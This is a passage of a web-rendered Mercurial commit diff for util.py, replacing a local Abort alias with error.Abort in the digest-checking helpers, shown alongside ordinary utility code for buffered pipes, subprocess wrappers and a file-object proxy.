##// END OF EJS Templates
util: use error.Abort instead of local alias
Yuya Nishihara -
r37114:895f209b default
parent child Browse files
Show More
@@ -1,4093 +1,4094
1 # util.py - Mercurial utility functions and platform specific implementations
1 # util.py - Mercurial utility functions and platform specific implementations
2 #
2 #
3 # Copyright 2005 K. Thananchayan <thananck@yahoo.com>
3 # Copyright 2005 K. Thananchayan <thananck@yahoo.com>
4 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
4 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
5 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
5 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
6 #
6 #
7 # This software may be used and distributed according to the terms of the
7 # This software may be used and distributed according to the terms of the
8 # GNU General Public License version 2 or any later version.
8 # GNU General Public License version 2 or any later version.
9
9
10 """Mercurial utility functions and platform specific implementations.
10 """Mercurial utility functions and platform specific implementations.
11
11
12 This contains helper routines that are independent of the SCM core and
12 This contains helper routines that are independent of the SCM core and
13 hide platform-specific details from the core.
13 hide platform-specific details from the core.
14 """
14 """
15
15
16 from __future__ import absolute_import, print_function
16 from __future__ import absolute_import, print_function
17
17
18 import abc
18 import abc
19 import bz2
19 import bz2
20 import collections
20 import collections
21 import contextlib
21 import contextlib
22 import errno
22 import errno
23 import gc
23 import gc
24 import hashlib
24 import hashlib
25 import imp
25 import imp
26 import io
26 import io
27 import itertools
27 import itertools
28 import mmap
28 import mmap
29 import os
29 import os
30 import platform as pyplatform
30 import platform as pyplatform
31 import re as remod
31 import re as remod
32 import shutil
32 import shutil
33 import signal
33 import signal
34 import socket
34 import socket
35 import stat
35 import stat
36 import subprocess
36 import subprocess
37 import sys
37 import sys
38 import tempfile
38 import tempfile
39 import time
39 import time
40 import traceback
40 import traceback
41 import warnings
41 import warnings
42 import zlib
42 import zlib
43
43
44 from . import (
44 from . import (
45 encoding,
45 encoding,
46 error,
46 error,
47 i18n,
47 i18n,
48 node as nodemod,
48 node as nodemod,
49 policy,
49 policy,
50 pycompat,
50 pycompat,
51 urllibcompat,
51 urllibcompat,
52 )
52 )
53 from .utils import (
53 from .utils import (
54 dateutil,
54 dateutil,
55 stringutil,
55 stringutil,
56 )
56 )
57
57
58 base85 = policy.importmod(r'base85')
58 base85 = policy.importmod(r'base85')
59 osutil = policy.importmod(r'osutil')
59 osutil = policy.importmod(r'osutil')
60 parsers = policy.importmod(r'parsers')
60 parsers = policy.importmod(r'parsers')
61
61
62 b85decode = base85.b85decode
62 b85decode = base85.b85decode
63 b85encode = base85.b85encode
63 b85encode = base85.b85encode
64
64
65 cookielib = pycompat.cookielib
65 cookielib = pycompat.cookielib
66 empty = pycompat.empty
66 empty = pycompat.empty
67 httplib = pycompat.httplib
67 httplib = pycompat.httplib
68 pickle = pycompat.pickle
68 pickle = pycompat.pickle
69 queue = pycompat.queue
69 queue = pycompat.queue
70 socketserver = pycompat.socketserver
70 socketserver = pycompat.socketserver
71 stderr = pycompat.stderr
71 stderr = pycompat.stderr
72 stdin = pycompat.stdin
72 stdin = pycompat.stdin
73 stdout = pycompat.stdout
73 stdout = pycompat.stdout
74 bytesio = pycompat.bytesio
74 bytesio = pycompat.bytesio
75 # TODO deprecate stringio name, as it is a lie on Python 3.
75 # TODO deprecate stringio name, as it is a lie on Python 3.
76 stringio = bytesio
76 stringio = bytesio
77 xmlrpclib = pycompat.xmlrpclib
77 xmlrpclib = pycompat.xmlrpclib
78
78
79 httpserver = urllibcompat.httpserver
79 httpserver = urllibcompat.httpserver
80 urlerr = urllibcompat.urlerr
80 urlerr = urllibcompat.urlerr
81 urlreq = urllibcompat.urlreq
81 urlreq = urllibcompat.urlreq
82
82
83 # workaround for win32mbcs
83 # workaround for win32mbcs
84 _filenamebytestr = pycompat.bytestr
84 _filenamebytestr = pycompat.bytestr
85
85
86 def isatty(fp):
86 def isatty(fp):
87 try:
87 try:
88 return fp.isatty()
88 return fp.isatty()
89 except AttributeError:
89 except AttributeError:
90 return False
90 return False
91
91
92 # glibc determines buffering on first write to stdout - if we replace a TTY
92 # glibc determines buffering on first write to stdout - if we replace a TTY
93 # destined stdout with a pipe destined stdout (e.g. pager), we want line
93 # destined stdout with a pipe destined stdout (e.g. pager), we want line
94 # buffering
94 # buffering
95 if isatty(stdout):
95 if isatty(stdout):
96 stdout = os.fdopen(stdout.fileno(), r'wb', 1)
96 stdout = os.fdopen(stdout.fileno(), r'wb', 1)
97
97
98 if pycompat.iswindows:
98 if pycompat.iswindows:
99 from . import windows as platform
99 from . import windows as platform
100 stdout = platform.winstdout(stdout)
100 stdout = platform.winstdout(stdout)
101 else:
101 else:
102 from . import posix as platform
102 from . import posix as platform
103
103
104 _ = i18n._
104 _ = i18n._
105
105
106 bindunixsocket = platform.bindunixsocket
106 bindunixsocket = platform.bindunixsocket
107 cachestat = platform.cachestat
107 cachestat = platform.cachestat
108 checkexec = platform.checkexec
108 checkexec = platform.checkexec
109 checklink = platform.checklink
109 checklink = platform.checklink
110 copymode = platform.copymode
110 copymode = platform.copymode
111 expandglobs = platform.expandglobs
111 expandglobs = platform.expandglobs
112 explainexit = platform.explainexit
112 explainexit = platform.explainexit
113 findexe = platform.findexe
113 findexe = platform.findexe
114 getfsmountpoint = platform.getfsmountpoint
114 getfsmountpoint = platform.getfsmountpoint
115 getfstype = platform.getfstype
115 getfstype = platform.getfstype
116 gethgcmd = platform.gethgcmd
116 gethgcmd = platform.gethgcmd
117 getuser = platform.getuser
117 getuser = platform.getuser
118 getpid = os.getpid
118 getpid = os.getpid
119 groupmembers = platform.groupmembers
119 groupmembers = platform.groupmembers
120 groupname = platform.groupname
120 groupname = platform.groupname
121 hidewindow = platform.hidewindow
121 hidewindow = platform.hidewindow
122 isexec = platform.isexec
122 isexec = platform.isexec
123 isowner = platform.isowner
123 isowner = platform.isowner
124 listdir = osutil.listdir
124 listdir = osutil.listdir
125 localpath = platform.localpath
125 localpath = platform.localpath
126 lookupreg = platform.lookupreg
126 lookupreg = platform.lookupreg
127 makedir = platform.makedir
127 makedir = platform.makedir
128 nlinks = platform.nlinks
128 nlinks = platform.nlinks
129 normpath = platform.normpath
129 normpath = platform.normpath
130 normcase = platform.normcase
130 normcase = platform.normcase
131 normcasespec = platform.normcasespec
131 normcasespec = platform.normcasespec
132 normcasefallback = platform.normcasefallback
132 normcasefallback = platform.normcasefallback
133 openhardlinks = platform.openhardlinks
133 openhardlinks = platform.openhardlinks
134 oslink = platform.oslink
134 oslink = platform.oslink
135 parsepatchoutput = platform.parsepatchoutput
135 parsepatchoutput = platform.parsepatchoutput
136 pconvert = platform.pconvert
136 pconvert = platform.pconvert
137 poll = platform.poll
137 poll = platform.poll
138 popen = platform.popen
138 popen = platform.popen
139 posixfile = platform.posixfile
139 posixfile = platform.posixfile
140 quotecommand = platform.quotecommand
140 quotecommand = platform.quotecommand
141 readpipe = platform.readpipe
141 readpipe = platform.readpipe
142 rename = platform.rename
142 rename = platform.rename
143 removedirs = platform.removedirs
143 removedirs = platform.removedirs
144 samedevice = platform.samedevice
144 samedevice = platform.samedevice
145 samefile = platform.samefile
145 samefile = platform.samefile
146 samestat = platform.samestat
146 samestat = platform.samestat
147 setbinary = platform.setbinary
147 setbinary = platform.setbinary
148 setflags = platform.setflags
148 setflags = platform.setflags
149 setsignalhandler = platform.setsignalhandler
149 setsignalhandler = platform.setsignalhandler
150 shellquote = platform.shellquote
150 shellquote = platform.shellquote
151 shellsplit = platform.shellsplit
151 shellsplit = platform.shellsplit
152 spawndetached = platform.spawndetached
152 spawndetached = platform.spawndetached
153 split = platform.split
153 split = platform.split
154 sshargs = platform.sshargs
154 sshargs = platform.sshargs
155 statfiles = getattr(osutil, 'statfiles', platform.statfiles)
155 statfiles = getattr(osutil, 'statfiles', platform.statfiles)
156 statisexec = platform.statisexec
156 statisexec = platform.statisexec
157 statislink = platform.statislink
157 statislink = platform.statislink
158 testpid = platform.testpid
158 testpid = platform.testpid
159 umask = platform.umask
159 umask = platform.umask
160 unlink = platform.unlink
160 unlink = platform.unlink
161 username = platform.username
161 username = platform.username
162
162
163 try:
163 try:
164 recvfds = osutil.recvfds
164 recvfds = osutil.recvfds
165 except AttributeError:
165 except AttributeError:
166 pass
166 pass
167 try:
167 try:
168 setprocname = osutil.setprocname
168 setprocname = osutil.setprocname
169 except AttributeError:
169 except AttributeError:
170 pass
170 pass
171 try:
171 try:
172 unblocksignal = osutil.unblocksignal
172 unblocksignal = osutil.unblocksignal
173 except AttributeError:
173 except AttributeError:
174 pass
174 pass
175
175
176 # Python compatibility
176 # Python compatibility
177
177
178 _notset = object()
178 _notset = object()
179
179
180 def safehasattr(thing, attr):
180 def safehasattr(thing, attr):
181 return getattr(thing, attr, _notset) is not _notset
181 return getattr(thing, attr, _notset) is not _notset
182
182
183 def _rapply(f, xs):
183 def _rapply(f, xs):
184 if xs is None:
184 if xs is None:
185 # assume None means non-value of optional data
185 # assume None means non-value of optional data
186 return xs
186 return xs
187 if isinstance(xs, (list, set, tuple)):
187 if isinstance(xs, (list, set, tuple)):
188 return type(xs)(_rapply(f, x) for x in xs)
188 return type(xs)(_rapply(f, x) for x in xs)
189 if isinstance(xs, dict):
189 if isinstance(xs, dict):
190 return type(xs)((_rapply(f, k), _rapply(f, v)) for k, v in xs.items())
190 return type(xs)((_rapply(f, k), _rapply(f, v)) for k, v in xs.items())
191 return f(xs)
191 return f(xs)
192
192
193 def rapply(f, xs):
193 def rapply(f, xs):
194 """Apply function recursively to every item preserving the data structure
194 """Apply function recursively to every item preserving the data structure
195
195
196 >>> def f(x):
196 >>> def f(x):
197 ... return 'f(%s)' % x
197 ... return 'f(%s)' % x
198 >>> rapply(f, None) is None
198 >>> rapply(f, None) is None
199 True
199 True
200 >>> rapply(f, 'a')
200 >>> rapply(f, 'a')
201 'f(a)'
201 'f(a)'
202 >>> rapply(f, {'a'}) == {'f(a)'}
202 >>> rapply(f, {'a'}) == {'f(a)'}
203 True
203 True
204 >>> rapply(f, ['a', 'b', None, {'c': 'd'}, []])
204 >>> rapply(f, ['a', 'b', None, {'c': 'd'}, []])
205 ['f(a)', 'f(b)', None, {'f(c)': 'f(d)'}, []]
205 ['f(a)', 'f(b)', None, {'f(c)': 'f(d)'}, []]
206
206
207 >>> xs = [object()]
207 >>> xs = [object()]
208 >>> rapply(pycompat.identity, xs) is xs
208 >>> rapply(pycompat.identity, xs) is xs
209 True
209 True
210 """
210 """
211 if f is pycompat.identity:
211 if f is pycompat.identity:
212 # fast path mainly for py2
212 # fast path mainly for py2
213 return xs
213 return xs
214 return _rapply(f, xs)
214 return _rapply(f, xs)
215
215
216 def bitsfrom(container):
216 def bitsfrom(container):
217 bits = 0
217 bits = 0
218 for bit in container:
218 for bit in container:
219 bits |= bit
219 bits |= bit
220 return bits
220 return bits
221
221
222 # python 2.6 still have deprecation warning enabled by default. We do not want
222 # python 2.6 still have deprecation warning enabled by default. We do not want
223 # to display anything to standard user so detect if we are running test and
223 # to display anything to standard user so detect if we are running test and
224 # only use python deprecation warning in this case.
224 # only use python deprecation warning in this case.
225 _dowarn = bool(encoding.environ.get('HGEMITWARNINGS'))
225 _dowarn = bool(encoding.environ.get('HGEMITWARNINGS'))
226 if _dowarn:
226 if _dowarn:
227 # explicitly unfilter our warning for python 2.7
227 # explicitly unfilter our warning for python 2.7
228 #
228 #
229 # The option of setting PYTHONWARNINGS in the test runner was investigated.
229 # The option of setting PYTHONWARNINGS in the test runner was investigated.
230 # However, module name set through PYTHONWARNINGS was exactly matched, so
230 # However, module name set through PYTHONWARNINGS was exactly matched, so
231 # we cannot set 'mercurial' and have it match eg: 'mercurial.scmutil'. This
231 # we cannot set 'mercurial' and have it match eg: 'mercurial.scmutil'. This
232 # makes the whole PYTHONWARNINGS thing useless for our usecase.
232 # makes the whole PYTHONWARNINGS thing useless for our usecase.
233 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'mercurial')
233 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'mercurial')
234 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext')
234 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext')
235 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext3rd')
235 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext3rd')
236 if _dowarn and pycompat.ispy3:
236 if _dowarn and pycompat.ispy3:
237 # silence warning emitted by passing user string to re.sub()
237 # silence warning emitted by passing user string to re.sub()
238 warnings.filterwarnings(r'ignore', r'bad escape', DeprecationWarning,
238 warnings.filterwarnings(r'ignore', r'bad escape', DeprecationWarning,
239 r'mercurial')
239 r'mercurial')
240 warnings.filterwarnings(r'ignore', r'invalid escape sequence',
240 warnings.filterwarnings(r'ignore', r'invalid escape sequence',
241 DeprecationWarning, r'mercurial')
241 DeprecationWarning, r'mercurial')
242
242
243 def nouideprecwarn(msg, version, stacklevel=1):
243 def nouideprecwarn(msg, version, stacklevel=1):
244 """Issue an python native deprecation warning
244 """Issue an python native deprecation warning
245
245
246 This is a noop outside of tests, use 'ui.deprecwarn' when possible.
246 This is a noop outside of tests, use 'ui.deprecwarn' when possible.
247 """
247 """
248 if _dowarn:
248 if _dowarn:
249 msg += ("\n(compatibility will be dropped after Mercurial-%s,"
249 msg += ("\n(compatibility will be dropped after Mercurial-%s,"
250 " update your code.)") % version
250 " update your code.)") % version
251 warnings.warn(pycompat.sysstr(msg), DeprecationWarning, stacklevel + 1)
251 warnings.warn(pycompat.sysstr(msg), DeprecationWarning, stacklevel + 1)
252
252
253 DIGESTS = {
253 DIGESTS = {
254 'md5': hashlib.md5,
254 'md5': hashlib.md5,
255 'sha1': hashlib.sha1,
255 'sha1': hashlib.sha1,
256 'sha512': hashlib.sha512,
256 'sha512': hashlib.sha512,
257 }
257 }
258 # List of digest types from strongest to weakest
258 # List of digest types from strongest to weakest
259 DIGESTS_BY_STRENGTH = ['sha512', 'sha1', 'md5']
259 DIGESTS_BY_STRENGTH = ['sha512', 'sha1', 'md5']
260
260
261 for k in DIGESTS_BY_STRENGTH:
261 for k in DIGESTS_BY_STRENGTH:
262 assert k in DIGESTS
262 assert k in DIGESTS
263
263
264 class digester(object):
264 class digester(object):
265 """helper to compute digests.
265 """helper to compute digests.
266
266
267 This helper can be used to compute one or more digests given their name.
267 This helper can be used to compute one or more digests given their name.
268
268
269 >>> d = digester([b'md5', b'sha1'])
269 >>> d = digester([b'md5', b'sha1'])
270 >>> d.update(b'foo')
270 >>> d.update(b'foo')
271 >>> [k for k in sorted(d)]
271 >>> [k for k in sorted(d)]
272 ['md5', 'sha1']
272 ['md5', 'sha1']
273 >>> d[b'md5']
273 >>> d[b'md5']
274 'acbd18db4cc2f85cedef654fccc4a4d8'
274 'acbd18db4cc2f85cedef654fccc4a4d8'
275 >>> d[b'sha1']
275 >>> d[b'sha1']
276 '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
276 '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
277 >>> digester.preferred([b'md5', b'sha1'])
277 >>> digester.preferred([b'md5', b'sha1'])
278 'sha1'
278 'sha1'
279 """
279 """
280
280
281 def __init__(self, digests, s=''):
281 def __init__(self, digests, s=''):
282 self._hashes = {}
282 self._hashes = {}
283 for k in digests:
283 for k in digests:
284 if k not in DIGESTS:
284 if k not in DIGESTS:
285 raise Abort(_('unknown digest type: %s') % k)
285 raise error.Abort(_('unknown digest type: %s') % k)
286 self._hashes[k] = DIGESTS[k]()
286 self._hashes[k] = DIGESTS[k]()
287 if s:
287 if s:
288 self.update(s)
288 self.update(s)
289
289
290 def update(self, data):
290 def update(self, data):
291 for h in self._hashes.values():
291 for h in self._hashes.values():
292 h.update(data)
292 h.update(data)
293
293
294 def __getitem__(self, key):
294 def __getitem__(self, key):
295 if key not in DIGESTS:
295 if key not in DIGESTS:
296 raise Abort(_('unknown digest type: %s') % k)
296 raise error.Abort(_('unknown digest type: %s') % k)
297 return nodemod.hex(self._hashes[key].digest())
297 return nodemod.hex(self._hashes[key].digest())
298
298
299 def __iter__(self):
299 def __iter__(self):
300 return iter(self._hashes)
300 return iter(self._hashes)
301
301
302 @staticmethod
302 @staticmethod
303 def preferred(supported):
303 def preferred(supported):
304 """returns the strongest digest type in both supported and DIGESTS."""
304 """returns the strongest digest type in both supported and DIGESTS."""
305
305
306 for k in DIGESTS_BY_STRENGTH:
306 for k in DIGESTS_BY_STRENGTH:
307 if k in supported:
307 if k in supported:
308 return k
308 return k
309 return None
309 return None
310
310
311 class digestchecker(object):
311 class digestchecker(object):
312 """file handle wrapper that additionally checks content against a given
312 """file handle wrapper that additionally checks content against a given
313 size and digests.
313 size and digests.
314
314
315 d = digestchecker(fh, size, {'md5': '...'})
315 d = digestchecker(fh, size, {'md5': '...'})
316
316
317 When multiple digests are given, all of them are validated.
317 When multiple digests are given, all of them are validated.
318 """
318 """
319
319
320 def __init__(self, fh, size, digests):
320 def __init__(self, fh, size, digests):
321 self._fh = fh
321 self._fh = fh
322 self._size = size
322 self._size = size
323 self._got = 0
323 self._got = 0
324 self._digests = dict(digests)
324 self._digests = dict(digests)
325 self._digester = digester(self._digests.keys())
325 self._digester = digester(self._digests.keys())
326
326
327 def read(self, length=-1):
327 def read(self, length=-1):
328 content = self._fh.read(length)
328 content = self._fh.read(length)
329 self._digester.update(content)
329 self._digester.update(content)
330 self._got += len(content)
330 self._got += len(content)
331 return content
331 return content
332
332
333 def validate(self):
333 def validate(self):
334 if self._size != self._got:
334 if self._size != self._got:
335 raise Abort(_('size mismatch: expected %d, got %d') %
335 raise error.Abort(_('size mismatch: expected %d, got %d') %
336 (self._size, self._got))
336 (self._size, self._got))
337 for k, v in self._digests.items():
337 for k, v in self._digests.items():
338 if v != self._digester[k]:
338 if v != self._digester[k]:
339 # i18n: first parameter is a digest name
339 # i18n: first parameter is a digest name
340 raise Abort(_('%s mismatch: expected %s, got %s') %
340 raise error.Abort(_('%s mismatch: expected %s, got %s') %
341 (k, v, self._digester[k]))
341 (k, v, self._digester[k]))
342
342
343 try:
343 try:
344 buffer = buffer
344 buffer = buffer
345 except NameError:
345 except NameError:
346 def buffer(sliceable, offset=0, length=None):
346 def buffer(sliceable, offset=0, length=None):
347 if length is not None:
347 if length is not None:
348 return memoryview(sliceable)[offset:offset + length]
348 return memoryview(sliceable)[offset:offset + length]
349 return memoryview(sliceable)[offset:]
349 return memoryview(sliceable)[offset:]
350
350
351 closefds = pycompat.isposix
351 closefds = pycompat.isposix
352
352
353 _chunksize = 4096
353 _chunksize = 4096
354
354
355 class bufferedinputpipe(object):
355 class bufferedinputpipe(object):
356 """a manually buffered input pipe
356 """a manually buffered input pipe
357
357
358 Python will not let us use buffered IO and lazy reading with 'polling' at
358 Python will not let us use buffered IO and lazy reading with 'polling' at
359 the same time. We cannot probe the buffer state and select will not detect
359 the same time. We cannot probe the buffer state and select will not detect
360 that data are ready to read if they are already buffered.
360 that data are ready to read if they are already buffered.
361
361
362 This class let us work around that by implementing its own buffering
362 This class let us work around that by implementing its own buffering
363 (allowing efficient readline) while offering a way to know if the buffer is
363 (allowing efficient readline) while offering a way to know if the buffer is
364 empty from the output (allowing collaboration of the buffer with polling).
364 empty from the output (allowing collaboration of the buffer with polling).
365
365
366 This class lives in the 'util' module because it makes use of the 'os'
366 This class lives in the 'util' module because it makes use of the 'os'
367 module from the python stdlib.
367 module from the python stdlib.
368 """
368 """
369 def __new__(cls, fh):
369 def __new__(cls, fh):
370 # If we receive a fileobjectproxy, we need to use a variation of this
370 # If we receive a fileobjectproxy, we need to use a variation of this
371 # class that notifies observers about activity.
371 # class that notifies observers about activity.
372 if isinstance(fh, fileobjectproxy):
372 if isinstance(fh, fileobjectproxy):
373 cls = observedbufferedinputpipe
373 cls = observedbufferedinputpipe
374
374
375 return super(bufferedinputpipe, cls).__new__(cls)
375 return super(bufferedinputpipe, cls).__new__(cls)
376
376
377 def __init__(self, input):
377 def __init__(self, input):
378 self._input = input
378 self._input = input
379 self._buffer = []
379 self._buffer = []
380 self._eof = False
380 self._eof = False
381 self._lenbuf = 0
381 self._lenbuf = 0
382
382
383 @property
383 @property
384 def hasbuffer(self):
384 def hasbuffer(self):
385 """True is any data is currently buffered
385 """True is any data is currently buffered
386
386
387 This will be used externally a pre-step for polling IO. If there is
387 This will be used externally a pre-step for polling IO. If there is
388 already data then no polling should be set in place."""
388 already data then no polling should be set in place."""
389 return bool(self._buffer)
389 return bool(self._buffer)
390
390
391 @property
391 @property
392 def closed(self):
392 def closed(self):
393 return self._input.closed
393 return self._input.closed
394
394
395 def fileno(self):
395 def fileno(self):
396 return self._input.fileno()
396 return self._input.fileno()
397
397
398 def close(self):
398 def close(self):
399 return self._input.close()
399 return self._input.close()
400
400
401 def read(self, size):
401 def read(self, size):
402 while (not self._eof) and (self._lenbuf < size):
402 while (not self._eof) and (self._lenbuf < size):
403 self._fillbuffer()
403 self._fillbuffer()
404 return self._frombuffer(size)
404 return self._frombuffer(size)
405
405
406 def readline(self, *args, **kwargs):
406 def readline(self, *args, **kwargs):
407 if 1 < len(self._buffer):
407 if 1 < len(self._buffer):
408 # this should not happen because both read and readline end with a
408 # this should not happen because both read and readline end with a
409 # _frombuffer call that collapse it.
409 # _frombuffer call that collapse it.
410 self._buffer = [''.join(self._buffer)]
410 self._buffer = [''.join(self._buffer)]
411 self._lenbuf = len(self._buffer[0])
411 self._lenbuf = len(self._buffer[0])
412 lfi = -1
412 lfi = -1
413 if self._buffer:
413 if self._buffer:
414 lfi = self._buffer[-1].find('\n')
414 lfi = self._buffer[-1].find('\n')
415 while (not self._eof) and lfi < 0:
415 while (not self._eof) and lfi < 0:
416 self._fillbuffer()
416 self._fillbuffer()
417 if self._buffer:
417 if self._buffer:
418 lfi = self._buffer[-1].find('\n')
418 lfi = self._buffer[-1].find('\n')
419 size = lfi + 1
419 size = lfi + 1
420 if lfi < 0: # end of file
420 if lfi < 0: # end of file
421 size = self._lenbuf
421 size = self._lenbuf
422 elif 1 < len(self._buffer):
422 elif 1 < len(self._buffer):
423 # we need to take previous chunks into account
423 # we need to take previous chunks into account
424 size += self._lenbuf - len(self._buffer[-1])
424 size += self._lenbuf - len(self._buffer[-1])
425 return self._frombuffer(size)
425 return self._frombuffer(size)
426
426
427 def _frombuffer(self, size):
427 def _frombuffer(self, size):
428 """return at most 'size' data from the buffer
428 """return at most 'size' data from the buffer
429
429
430 The data are removed from the buffer."""
430 The data are removed from the buffer."""
431 if size == 0 or not self._buffer:
431 if size == 0 or not self._buffer:
432 return ''
432 return ''
433 buf = self._buffer[0]
433 buf = self._buffer[0]
434 if 1 < len(self._buffer):
434 if 1 < len(self._buffer):
435 buf = ''.join(self._buffer)
435 buf = ''.join(self._buffer)
436
436
437 data = buf[:size]
437 data = buf[:size]
438 buf = buf[len(data):]
438 buf = buf[len(data):]
439 if buf:
439 if buf:
440 self._buffer = [buf]
440 self._buffer = [buf]
441 self._lenbuf = len(buf)
441 self._lenbuf = len(buf)
442 else:
442 else:
443 self._buffer = []
443 self._buffer = []
444 self._lenbuf = 0
444 self._lenbuf = 0
445 return data
445 return data
446
446
447 def _fillbuffer(self):
447 def _fillbuffer(self):
448 """read data to the buffer"""
448 """read data to the buffer"""
449 data = os.read(self._input.fileno(), _chunksize)
449 data = os.read(self._input.fileno(), _chunksize)
450 if not data:
450 if not data:
451 self._eof = True
451 self._eof = True
452 else:
452 else:
453 self._lenbuf += len(data)
453 self._lenbuf += len(data)
454 self._buffer.append(data)
454 self._buffer.append(data)
455
455
456 return data
456 return data
457
457
458 def mmapread(fp):
458 def mmapread(fp):
459 try:
459 try:
460 fd = getattr(fp, 'fileno', lambda: fp)()
460 fd = getattr(fp, 'fileno', lambda: fp)()
461 return mmap.mmap(fd, 0, access=mmap.ACCESS_READ)
461 return mmap.mmap(fd, 0, access=mmap.ACCESS_READ)
462 except ValueError:
462 except ValueError:
463 # Empty files cannot be mmapped, but mmapread should still work. Check
463 # Empty files cannot be mmapped, but mmapread should still work. Check
464 # if the file is empty, and if so, return an empty buffer.
464 # if the file is empty, and if so, return an empty buffer.
465 if os.fstat(fd).st_size == 0:
465 if os.fstat(fd).st_size == 0:
466 return ''
466 return ''
467 raise
467 raise
468
468
469 def popen2(cmd, env=None, newlines=False):
469 def popen2(cmd, env=None, newlines=False):
470 # Setting bufsize to -1 lets the system decide the buffer size.
470 # Setting bufsize to -1 lets the system decide the buffer size.
471 # The default for bufsize is 0, meaning unbuffered. This leads to
471 # The default for bufsize is 0, meaning unbuffered. This leads to
472 # poor performance on Mac OS X: http://bugs.python.org/issue4194
472 # poor performance on Mac OS X: http://bugs.python.org/issue4194
473 p = subprocess.Popen(cmd, shell=True, bufsize=-1,
473 p = subprocess.Popen(cmd, shell=True, bufsize=-1,
474 close_fds=closefds,
474 close_fds=closefds,
475 stdin=subprocess.PIPE, stdout=subprocess.PIPE,
475 stdin=subprocess.PIPE, stdout=subprocess.PIPE,
476 universal_newlines=newlines,
476 universal_newlines=newlines,
477 env=env)
477 env=env)
478 return p.stdin, p.stdout
478 return p.stdin, p.stdout
479
479
480 def popen3(cmd, env=None, newlines=False):
480 def popen3(cmd, env=None, newlines=False):
481 stdin, stdout, stderr, p = popen4(cmd, env, newlines)
481 stdin, stdout, stderr, p = popen4(cmd, env, newlines)
482 return stdin, stdout, stderr
482 return stdin, stdout, stderr
483
483
484 def popen4(cmd, env=None, newlines=False, bufsize=-1):
484 def popen4(cmd, env=None, newlines=False, bufsize=-1):
485 p = subprocess.Popen(cmd, shell=True, bufsize=bufsize,
485 p = subprocess.Popen(cmd, shell=True, bufsize=bufsize,
486 close_fds=closefds,
486 close_fds=closefds,
487 stdin=subprocess.PIPE, stdout=subprocess.PIPE,
487 stdin=subprocess.PIPE, stdout=subprocess.PIPE,
488 stderr=subprocess.PIPE,
488 stderr=subprocess.PIPE,
489 universal_newlines=newlines,
489 universal_newlines=newlines,
490 env=env)
490 env=env)
491 return p.stdin, p.stdout, p.stderr, p
491 return p.stdin, p.stdout, p.stderr, p
492
492
493 class fileobjectproxy(object):
493 class fileobjectproxy(object):
494 """A proxy around file objects that tells a watcher when events occur.
494 """A proxy around file objects that tells a watcher when events occur.
495
495
496 This type is intended to only be used for testing purposes. Think hard
496 This type is intended to only be used for testing purposes. Think hard
497 before using it in important code.
497 before using it in important code.
498 """
498 """
499 __slots__ = (
499 __slots__ = (
500 r'_orig',
500 r'_orig',
501 r'_observer',
501 r'_observer',
502 )
502 )
503
503
504 def __init__(self, fh, observer):
504 def __init__(self, fh, observer):
505 object.__setattr__(self, r'_orig', fh)
505 object.__setattr__(self, r'_orig', fh)
506 object.__setattr__(self, r'_observer', observer)
506 object.__setattr__(self, r'_observer', observer)
507
507
508 def __getattribute__(self, name):
508 def __getattribute__(self, name):
509 ours = {
509 ours = {
510 r'_observer',
510 r'_observer',
511
511
512 # IOBase
512 # IOBase
513 r'close',
513 r'close',
514 # closed if a property
514 # closed if a property
515 r'fileno',
515 r'fileno',
516 r'flush',
516 r'flush',
517 r'isatty',
517 r'isatty',
518 r'readable',
518 r'readable',
519 r'readline',
519 r'readline',
520 r'readlines',
520 r'readlines',
521 r'seek',
521 r'seek',
522 r'seekable',
522 r'seekable',
523 r'tell',
523 r'tell',
524 r'truncate',
524 r'truncate',
525 r'writable',
525 r'writable',
526 r'writelines',
526 r'writelines',
527 # RawIOBase
527 # RawIOBase
528 r'read',
528 r'read',
529 r'readall',
529 r'readall',
530 r'readinto',
530 r'readinto',
531 r'write',
531 r'write',
532 # BufferedIOBase
532 # BufferedIOBase
533 # raw is a property
533 # raw is a property
534 r'detach',
534 r'detach',
535 # read defined above
535 # read defined above
536 r'read1',
536 r'read1',
537 # readinto defined above
537 # readinto defined above
538 # write defined above
538 # write defined above
539 }
539 }
540
540
541 # We only observe some methods.
541 # We only observe some methods.
542 if name in ours:
542 if name in ours:
543 return object.__getattribute__(self, name)
543 return object.__getattribute__(self, name)
544
544
545 return getattr(object.__getattribute__(self, r'_orig'), name)
545 return getattr(object.__getattribute__(self, r'_orig'), name)
546
546
547 def __nonzero__(self):
547 def __nonzero__(self):
548 return bool(object.__getattribute__(self, r'_orig'))
548 return bool(object.__getattribute__(self, r'_orig'))
549
549
550 __bool__ = __nonzero__
550 __bool__ = __nonzero__
551
551
552 def __delattr__(self, name):
552 def __delattr__(self, name):
553 return delattr(object.__getattribute__(self, r'_orig'), name)
553 return delattr(object.__getattribute__(self, r'_orig'), name)
554
554
555 def __setattr__(self, name, value):
555 def __setattr__(self, name, value):
556 return setattr(object.__getattribute__(self, r'_orig'), name, value)
556 return setattr(object.__getattribute__(self, r'_orig'), name, value)
557
557
558 def __iter__(self):
558 def __iter__(self):
559 return object.__getattribute__(self, r'_orig').__iter__()
559 return object.__getattribute__(self, r'_orig').__iter__()
560
560
561 def _observedcall(self, name, *args, **kwargs):
561 def _observedcall(self, name, *args, **kwargs):
562 # Call the original object.
562 # Call the original object.
563 orig = object.__getattribute__(self, r'_orig')
563 orig = object.__getattribute__(self, r'_orig')
564 res = getattr(orig, name)(*args, **kwargs)
564 res = getattr(orig, name)(*args, **kwargs)
565
565
566 # Call a method on the observer of the same name with arguments
566 # Call a method on the observer of the same name with arguments
567 # so it can react, log, etc.
567 # so it can react, log, etc.
568 observer = object.__getattribute__(self, r'_observer')
568 observer = object.__getattribute__(self, r'_observer')
569 fn = getattr(observer, name, None)
569 fn = getattr(observer, name, None)
570 if fn:
570 if fn:
571 fn(res, *args, **kwargs)
571 fn(res, *args, **kwargs)
572
572
573 return res
573 return res
574
574
575 def close(self, *args, **kwargs):
575 def close(self, *args, **kwargs):
576 return object.__getattribute__(self, r'_observedcall')(
